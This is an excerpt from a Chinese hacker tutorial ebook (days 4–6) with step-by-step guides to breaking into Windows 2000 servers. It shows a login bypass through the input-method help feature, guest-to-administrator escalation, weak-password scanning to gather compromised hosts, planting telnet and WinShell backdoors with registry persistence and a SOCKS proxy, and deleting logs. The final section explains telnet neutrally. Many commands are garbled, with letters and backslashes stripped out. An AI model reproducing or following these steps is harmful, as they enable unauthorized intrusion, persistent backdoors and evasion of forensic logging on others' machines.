30天打造专业红客-第4章
按键盘上方向键 ← 或 → 可快速上下翻页,按键盘上的 Enter 键可回到本书目录页,按键盘上方向键 ↑ 可回到本页顶部!
————未阅读完?加入书签已便下次继续阅读!
入侵步骤:
一,获得管理员账号。
我们先对一个网段进行扫描,扫描端口设为3389,运行客户端连接管理器,将扫描到的任一地址加入到,设置好客户端连接管理器,然后与服务器连结。几秒钟后,屏幕上显示出WIN2000登录界面(如果发现是英文或繁体中文版,放弃,另换一个地址),用CTRL+SHIFT快速切换输入法,切换至全拼,这时在登录界面左下角将出现输入法状态条(如果没有出现,请耐心等待,因为对方的数据流传输还有一个过程)。用右键点击状态条上的微软徽标,弹出“帮助”(如果发现“帮助”呈灰色,放弃,因为对方很可能发现并已经补上了这个漏洞),打开“帮助”一栏中“操作指南”,在最上面的任务栏点击右键,会弹出一个菜单,打开“跳至URL”。此时将出现WIN2000的系统安装路径和要求我们填入的路径的空白栏。比如,该系统安装在C盘上,就在空白栏中填入〃c:winntsystem32〃。然后按“确定”,于是我们就成功地绕过了身份验证,进入了系统的SYSTEM32目录。
现在我们要获得一个账号,成为系统的合法用户。在该目录下找到〃。exe〃,为〃。exe〃创建一个快捷方式,右键点击该快捷方式,在“属性”-》“目标”-》c:winntsystem32。exe后面空一格,填入〃user guest /active :yes〃点“确定”。这一步骤目的在于用。exe激活被禁止使用的guest账户,当然也可以利用〃user 用户名 密码/add〃,创建一个新账号,但容易引起网管怀疑。运行该快捷方式,此时你不会看到运行状态,但guest用户已被激活。然后又修改该快捷方式,填入〃user guest 密码〃,运行,于是guest便有了密码。最后,再次修改,填入“localgroup administrators guest /add,将guest变成系统管理员。
注意事项:1、在这过程中,如果对方管理员正在使用终端服务管理器,他将看到你所打开的进程id,你的ip和机器名,甚至能够给你发送消息。
2、终端服务器在验证你的身份的时候只留给了你一分钟的时间,在这一分钟内如果你不能完成上述操作,你只能再连结。
3、你所看到的图像与操作会有所延迟,这受网速的影响。
二,创建跳板。
再次登录终端用务器,以〃guest〃身份进入,此时guest已是系统管理员,已具备一切可执行权。打开“控制面板”,进入“网络和拔号连接”,在“本地连接”或“拔号连接”中查看属性,看对方是否选择“Microsoft 网络的文件和打印机共享”,如果没有,就打上勾。对方如果使用的是拔号上网,下次拔号网络共享才会打开。
退出对方系统,在本地机命令提示符下,输入
use IP AddressIPC '〃password〃' /user:〃guset〃,通过IPC的远程登陆就成功了。
登陆成功之后先复制一个Tel的程序上去(小榕流光安装目录下的Tools目录里的Srv。exe;另外,还有ntml。xex,一会要用),这个程序是在对方上面开一个Tel服务,端口是99。
copy c:hacksrv。exe ***。***。***。***admin
然后利用定时服务启动它,先了解对方的时间:
time ***。***。***。***
显示:
***。***。***。*** 的当前时间是 2001/1/8 下午 08:55
命令成功完成。
然后启动srv。exe:
at ***。***。***。*** 09:00 srv。exe
显示:
新加了一项作业,其作业 ID = 0
过几分钟后,tel ***。***。***。*** 99
这里不需要验证身份,直接登录,显示:
c:winnt:system32》
我们就成功登陆上去了。然后又在本地打开命令提示符,另开一个窗口,输入:
copy c:hackntlm。exe 211。21。193。202admin
把事先存放在hack目录里的ntlm。exe拷过去。然后又回到刚才的tel窗口,运行ntlm。exe
C:WINNTsystem32》ntlm
显示:
Windows 2000 Tel Dump; by Assassin; All Rights Reserved。
Done!
C:WINNTsystem32》
C:WINNTsystem32》
好,现在我们来启动WIN2000本身的tel,首先终止srv。exe的tel服务:
stop tel 系统告诉你并没有启动tel,不理它,继续:
start tel 这次真的启动了tel,我们可以在另开的命令提示符窗口tel到对方的
23端口,验证身份,输入我们的guest账号和密码,它就真正成为我们的跳板了。我们可以利用它到其它的主机去。
三、扫除脚印:
删除为。exe 创建的快捷方式,删除winntsystem32logfiles下边的日志文件
'第5天'从简单的网络命令讲起
有个朋友问了我个问题:端口映射是什么意思??
其实很简单的,采用端口映射(Port Mapping)的方法,可以实现从Inter到局域网内部机器的特定端口服务的访问。例如,你所使用的机子处于一个连接到Inter的局域网内,你在机子上所开的所有服务(如FTP),默认情况下外界是访问不了的。这是因为你机子的IP是局域网内部IP,而外界能访问的只有你所连接的服务器的IP,由于整个局域网在Inter上只有一个真正的IP地址,而这个IP地址是属于局域网中服务器独有的。所以,外部的Inter登录时只可以找到局域网中的服务器,那你提供的服务当然是不起作用的。
所以解决这个问题的方法就是采用PM了。
有篇文章不错。大家看看:http://。pconline。。cn/pcedu/soft/lan/jywgl/10301/127157。html
继续讲,昨天有人说我找到个肉鸡,但不会用远程控制软件。先说用什么好呢
我推荐Remote Administrator,有篇介绍它的文章很好:http://。pcworld。。cn/2002/back_issues/2205/0533e。asp
下载:http://。skycn。/soft/15592。html
我想里面的说明你应该能很好理解的
现在我以一个例子来说一下怎么获得一个肉鸡,虽然前面一直在说,但好象有点乱的,下面说的这个有点投机取巧的感觉,至少我这样觉得,不过因为很多朋友说都5天了,我什么都没搞到啊,所以只能。。
第一步:扫描弱口令
这里我用20cn开发的scanipc (这http://down。yqdown。/xdown/yqdown0316/scanipc。rar有下的)
不一会就会扫到很多有弱口令的主机
(你可以拿你们学校的IP试试)
这里我用opentel(远程启动TEL的小东西,这里下:http://。infosw。/down/software。asp?id=1520)给扫描到开了空口令的主机开个端口让我们tel连接上去
;开了23端口,并可以连接上的主机就不用进行次步骤了!
Opentel使用方法:
OpenTel。exe server
列如:
C:》OpenTel。exe 192。168。1。2 administrator 123456 1 90 用户名:administrator 密码:123456
NTLM认证方式:1(也可以选择0请自己测试) 开的端口:90
运行完,如果屏幕上出现 Disconnecting server。。。Successfully! 就说明已经成功。
这样,我们就能够得到一个开90端口的Tel服务器了。
Tel 192。168。1。2 90
这样就可以登录上去了。
第三步:配置并安装后门程序
这里我选择WinShell(小巧精干我喜欢下载:http://。hktk。/soft/soft_server/winshell。html),用winshell主程序设置好后门,然后把后门程序传到台FTP空间上!
列如:
c:》ftp
ftp》open。cnwill。
然后输入用户名字 密码把后门传上去mput c:cnwill。exe
现在我们登陆到肉鸡上 Tel 192。168。1。2 90
把刚上传的后门程序下载并运行(别忘记删除 后门程序)
『后门也可以用命令完成』
user 192。168。1。2 90ipc 〃〃 /user:〃administrator〃
' 建 立 IPC 连 接 '
copy d:zilong。exe 192。168。1。2 90adminsystem32
' 上 传 一 个 后 门 程 序 到 对 方 的 主 机 里'
copy d:long。exe 192。168。1。2 90adminsystem32
'上 传 一 个 删 除 日 志 程 序 到 对 方 的 主 机 里'
copy d:scoks。exe 192。168。1。2 90adminsystem32
' 上 传 一 个 SCOKS 代 理 程 序 到 对 方 的 主 机 里'
copy d:zilong。reg 192。168。1。2 90adminsystem32
'上 传 导 入 注 册 表的 REG 文 件 到 对 方 的 主 机 里'请看后门说明
time 192。168。1。2 90
' 得 到 对 方 主 机 的 当 前 时 间'
at 192。168。1。2 90 13:20 zilong。exe
'用 a t命 令 执 行 我 们 的 后 门 程 序' 别 把 时 间 搞 错 了 哦
==============
如果大家用不习惯命令的话;那就用流光的IPC种植者吧;简单易用。这里就不赘述啦
=============
tel 192。168。1。2 90
' 从 我 们 设 置 的 后 门 程 序 登 陆 主 机 '
user **** /add
'近来后添加一个用户名再说或者也可以选择激活guest'
localgroup administrators **** /add
' 把 自 己 添 加 到 管 理 组 里;这 样 我 们 就 是 超 级 管 理 员 了'
regedit /s c:winntsystem32zilong。reg
' 把 后 门 程 序 导 入 注 册 表 的 启 动 项'这样做是防止被别人停止我们
的后门服务程序;就算我们的后门服务程序被停止了;在主机重启动后我们的后门
服务就又继续运行了。
SOCKS …install
' 开 始 安 装 socks 代 理'
SCOKS …config starttype 2
' 使 SOCKS 代 理 程 序 自 动 运 行,不 怕 肉 鸡 再 重 启 了'
socks …config port 1080
' socks 代 理 端 口 设 置 为 1080 '
start skserver
' 启 动 SOCKS 代 理 服 务 '可以打开QQ设置IP代理了
long
' 刚 才 上 传 的 一 个 删 除 日 志 程 序;运 行 它 就 可 以 了'
'第6天'从tel讲起
先说tel;什么是tel?Tel服务虽然也属于客户机/服务器模型的服务,但它更大的意义在于实现了基于Tel协议的远程登录(远程交互式计算),那么什么是远程登录?
我想这个大家都明白一点;定义:远程登陆是指用户使用Tel命令,使自己的计算机暂时成为远程主机的一个仿真终端的过程。仿真终端等效于一个非智能的机器,它只负责把用户输入的每个字符传递给主机,再将主机输出的每个信息回显在屏幕上。
使用Tel协议进行远程登陆时需要满足以下条件:在本的计算机上必须装有包含Tel协议的客户程序;必须知道远程主机的Ip地址或域名;必须知道登录标识与口令。
Tel远程登录服务分为以下4个过程:
1)本地与远程主机建立连接。该过程实际上是建立一个TCP连接,用户必须知道远程主机的Ip地址或域名;
2)将本地终端上输入的用户名和口令及以后输入的任何命令或字符以NVT( Virtual Terminal)格式传送到远程主机。该过程实际上是从本地主机向远程主机发送一个IP数据报;
3)将远程主机输出的NVT格式的数据转化为本地所接受的格式送回本地终端,包括输入命令回显和命令执行结果;
4)最后,本地终端对远程主机进行撤消连接。该过程是撤销一个TCP连接。
再说一下什么叫Tel协议?简单点说Tel协议是TCP/IP协议族中的一员,是Inter远程登陆服务的标准协议。应用Tel协议能够把本地用户所使用的计算机变成远程主机系统的一个终端。它提供了三种基本服务:
1)Tel定义一个网络虚拟终端为远的系统提供一个标准接口。客户机程序不必详细了解远的系统,他们只需构造使用标准接口的程序;
2)Tel包括一个允许客户机和服务器协商选项的机制,而且它还提供一组标准选项;
3)Tel对称处理连接的两端,即Tel不强迫客户机从键盘输入,也不强迫客户机在屏幕上显示输出。
关于这个就说这么多了;至于其他的一些就不说了;因为没什么帮助对我门;如果你有兴趣;可以去本站查查相关资料
再说说Win2000的Tel服务;因为大部分服务器用的都是2000的
Win2000为我们提供了Tel客户机和服务器程序:Tel。exe是客户机程序(Client),tlntsvr。exe是服务器程序(server),同时它还为我们提供了Tel服务器管理程序tlntadmn。exe。 其实从应用层面上,Win2000的Tel服务并没有什么可说的,绝大部分内容你都可以从HELP文件中得到,我在此只是把它稍微整理一下而已。Windows 2000 默认安装了 Tel 服务,但是并没有默认启动。下面给出HELP文件中 Tel 服务的一部分默认设置:
AllowTrustedDomain:是否允许域用户访问。默认值是1,允许信任域用户访问。可以改为0: 不允许域用户访问(只允许本地用户)。
DefaultDomain:可以对